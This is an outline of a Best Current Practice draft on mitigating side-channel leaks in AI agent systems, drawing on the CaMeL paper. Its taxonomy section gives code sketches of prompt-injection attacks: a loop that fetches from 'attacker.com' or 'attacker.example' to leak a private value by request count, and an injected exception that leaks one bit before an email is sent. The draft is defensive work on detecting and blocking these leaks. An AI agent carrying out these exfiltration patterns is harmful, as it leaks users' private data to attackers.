---
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
draft_name: draft-nennemann-ai-agent-side-channels-00
intended_wg: SECDISPATCH (BCP)
status: outline
gaps_addressed: [89, 93]
camel_sections: [7]
document_type: BCP (Best Current Practice)
date: 2026-03-09
---
# Side-Channel Mitigation Framework for AI Agent Interactions
## 1. Problem Statement
Even when AI agent systems implement strong security measures (capability-based policies, control/data flow integrity, Privileged/Quarantined execution), **side-channel attacks** can still leak private data. CaMeL (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:
1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception
3. **Timing side-channels**: an adversary infers private values from execution timing differences
These are not theoretical: CaMeL demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in its evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but careful system design can reduce their impact.
This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.
## 2. Scope
This document provides:
1. A **taxonomy of side-channel risks** specific to AI agent systems
2. **Mitigation strategies** for each risk category
3. **Tool API design guidelines** that minimize side-channel exposure
4. **Monitoring patterns** for detecting side-channel exploitation
5. **STRICT vs. NORMAL mode** recommendations
## 3. Side-Channel Taxonomy
### 3.1 External Resource Inference
**Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts requests to infer the private value.
**CaMeL context**: In NORMAL mode, the loop body does not inherit dependencies from the loop condition. In STRICT mode, a `fetch()` inside the loop inherits the dependency on `private_var`, and policies can block it.
**Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference).
```
Attacker's Server
│ GET /cat.jpg ×10 ← private_var = 10
│ GET /cat.jpg ×20 ← private_var = 20
└── attacker infers private_var by counting requests
```
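A minimal sketch of this channel, with `fetch` and the attacker URL as hypothetical stand-ins for any externally observable tool call:

```python
# Hypothetical sketch of external resource inference: the request
# count itself is the covert channel. `fetch` stands in for any tool
# that contacts an attacker-observable endpoint.
def exfiltrate_by_count(private_var: int, fetch) -> None:
    for _ in range(private_var):
        fetch("https://attacker.example/cat.jpg")

# The attacker recovers private_var simply by counting hits
# in their server logs.
```

Unary counting is the simplest encoding; an attacker can also encode individual bits in *which* of several URLs is fetched, which is why the bandwidth is bounded in bits rather than in request count.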
### 3.2 Exception-Based Bit Leaking
**Attack**: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.
**CaMeL context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 when a condition on private data holds, which then indexes past the end of a list).
```python
# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10
# ADVERSARY OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception
```
**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).
### 3.3 Timing Side-Channels
**Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.
**CaMeL context**: CaMeL's restricted Python subset does not include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.
**Bandwidth**: depends on timing precision — generally low but non-zero.
### 3.4 Agent-Specific Side Channels (Beyond CaMeL)
| Channel | Attack Vector | Bandwidth |
|---------|--------------|-----------|
| **Token usage** | Private data influences response length → observable token count | Medium |
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
| **Error message content** | Error details leak through supposedly sanitized channels | High |
| **Model confidence** | Probability distributions in structured output leak information | Low |
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |
## 4. Mitigation Strategies
### 4.1 STRICT Mode Execution
**Recommendation: Use STRICT mode for all security-sensitive agent operations.**
In STRICT mode:
- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator
- This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph
- Security policies can detect and block the side-channel
**Trade-off**: STRICT mode reduces utility. CaMeL reports that the policy triggering rate in benign scenarios rises from 33.87% (NORMAL) to 53.23% (STRICT). Recommendation: use STRICT mode by default, and allow NORMAL mode only for explicitly low-sensitivity operations.
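The inheritance rule can be illustrated with a toy dependency-label wrapper. This is a simplified sketch, not the actual STRICT-mode implementation; `Labeled`, `strict_range`, and `policy_allows_fetch` are invented names:

```python
from dataclasses import dataclass
from typing import Any, FrozenSet, Iterator

@dataclass(frozen=True)
class Labeled:
    """A value tagged with the set of data sources it depends on."""
    value: Any
    deps: FrozenSet[str] = frozenset()

def strict_range(n: Labeled) -> Iterator[Labeled]:
    # STRICT mode: every value produced inside the loop body
    # inherits the loop bound's dependency set.
    for i in range(n.value):
        yield Labeled(i, n.deps)

def policy_allows_fetch(control_deps: FrozenSet[str]) -> bool:
    # Deny external requests whose control flow depends on private data.
    return "private" not in control_deps
```

With `private_var = Labeled(10, frozenset({"private"}))`, every iteration carries the `private` label, so a policy check at the `fetch()` call site can refuse the request.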
### 4.2 Exception Handling Hardening
**Recommendation: Use error-value types instead of exceptions for data-dependent operations.**
Exceptions create side channels because they halt execution. Instead:
```python
# VULNERABLE: exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if exception
except Exception:
    pass  # attacker observes: was email sent?

# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data)  # returns Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way
```
Agent frameworks SHOULD:
- Use `Result`/`Either` types instead of exceptions for Processor outputs
- Ensure both success and failure paths make the same external observations
- Redact exception messages before they reach the Planner
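A minimal sketch of such a `Result` type; the names are illustrative rather than any specific framework's API:

```python
from dataclasses import dataclass
from typing import Generic, Optional, TypeVar

T = TypeVar("T")

@dataclass
class Result(Generic[T]):
    """Error-value type: failure is data, not control flow."""
    _value: Optional[T] = None
    _error: Optional[str] = None

    def is_ok(self) -> bool:
        return self._error is None

    @property
    def value(self) -> Optional[T]:
        return self._value

def risky_operation(data) -> "Result[str]":
    # Never raises: failures become ordinary return values, so the
    # success and failure paths execute the same statements.
    if data is None:
        return Result(_error="no data")
    return Result(_value=str(data))
```

Because no exception is thrown, execution always reaches the subsequent tool call, and the attacker cannot read a bit from its presence or absence.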
### 4.3 Constant-Pattern Tool Calls
**Recommendation: Where feasible, make tool call patterns independent of private data.**
- Avoid data-dependent loops that make external calls
- Use batch operations instead of per-item calls
- Pad tool call sequences to fixed lengths for sensitive operations
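The padding idea can be sketched as follows; `call` and `dummy` are placeholders for a real tool invocation and an innocuous padding payload:

```python
def padded_batch(items, pad_to, call, dummy):
    # Always make exactly pad_to calls, so the observable call count
    # is independent of len(items).
    real = items[:pad_to]
    for item in real:
        call(item)
    for _ in range(pad_to - len(real)):
        call(dummy)  # padding call, indistinguishable to an observer
```

The trade-off is wasted calls (and a hard cap at `pad_to` real items), which is why this is recommended only for sensitive operations.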
### 4.4 External Request Restrictions
**Recommendation: Restrict which external endpoints agents can contact.**
- Allowlist approved external domains
- Proxy all external requests through a controlled gateway
- Rate-limit external requests per agent session
- Log all external requests for anomaly detection
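Taken together, these controls amount to a small egress-gateway check; the domain names and limits below are illustrative:

```python
from urllib.parse import urlparse

ALLOWED_DOMAINS = {"api.partner.example", "cdn.example"}  # hypothetical allowlist
MAX_REQUESTS_PER_SESSION = 20

def gateway_allows(url: str, session_request_count: int, audit_log: list) -> bool:
    # Allowlist + rate limit; every attempt is logged for anomaly detection.
    host = urlparse(url).hostname or ""
    allowed = (host in ALLOWED_DOMAINS
               and session_request_count < MAX_REQUESTS_PER_SESSION)
    audit_log.append((url, allowed))
    return allowed
```

Routing all agent traffic through such a gateway also gives the monitoring layer (Section 6) a single choke point to observe.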
## 5. Tool API Design Guidelines
Tool developers SHOULD design APIs that minimize side-channel exposure:
### 5.1 Do
- Return consistent response structures regardless of input
- Use fixed-size responses where possible
- Include provenance metadata in all outputs
- Document trust levels of output fields (which are public, which are private)
### 5.2 Don't
- Return variable-length arrays that depend on private data in observable ways
- Include internal identifiers in error messages
- Use response timing that depends on input sensitivity
- Expose iteration counts or batch sizes in responses
### 5.3 Tool Capability Annotations
Tools SHOULD declare their side-channel properties:
```json
{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}
```
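An orchestrator could enforce the `tool:recommended_mode` field before each invocation; a sketch under the assumption that annotations arrive as JSON in the schema above:

```python
import json

def check_mode(annotation_json: str, current_mode: str) -> bool:
    # Refuse to invoke a tool whose recommended execution mode is
    # stricter than the mode the session is running in.
    ann = json.loads(annotation_json)
    recommended = ann.get("tool:recommended_mode", "NORMAL")
    if recommended == "STRICT" and current_mode != "STRICT":
        return False
    return True
```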
## 6. Monitoring Patterns
### 6.1 Anomaly Detection Signals
| Signal | Potential Attack | Action |
|--------|-----------------|--------|
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance > threshold | Timing side-channel | Log + investigate |
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |
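The exception-rate signal, for instance, can be tracked with a sliding window; the window size and threshold here are illustrative defaults:

```python
from collections import deque

class ExceptionRateTracker:
    """Flags sessions whose recent exception rate exceeds a threshold."""

    def __init__(self, window: int = 50, threshold: float = 0.2):
        self.events = deque(maxlen=window)  # True = an exception was raised
        self.threshold = threshold

    def record(self, raised: bool) -> None:
        self.events.append(raised)

    def anomalous(self) -> bool:
        if not self.events:
            return False
        return sum(self.events) / len(self.events) > self.threshold
```

A bit-leaking attack needs roughly one exception per leaked bit, so even a modest threshold bounds the channel's usable bandwidth before the halt-and-review action triggers.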
### 6.2 Monitoring Architecture
```
Agent Execution
  ├──► Side-Channel Monitor
  │      ├── Request pattern analyzer
  │      ├── Exception rate tracker
  │      ├── Timing variance detector
  │      └── Tool call pattern validator
  │               │
  │               ▼
  │      Alert / Halt Decision
  └──► Normal execution continues (if no anomaly)
```
## 7. Relationship to Other Drafts
| Draft | Side-Channel Relevance |
|-------|----------------------|
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |
## 8. Security Considerations
This entire document is about security. Key meta-considerations:
- Side-channel mitigation is **defense in depth** — no single measure eliminates all channels
- The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
- New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
- Side-channel monitoring itself can create privacy issues (logging all agent interactions)
## 9. Open Questions
1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration?
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How to stay ahead?
3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation?
4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leak more than single-agent)?
## 10. References
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
- Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.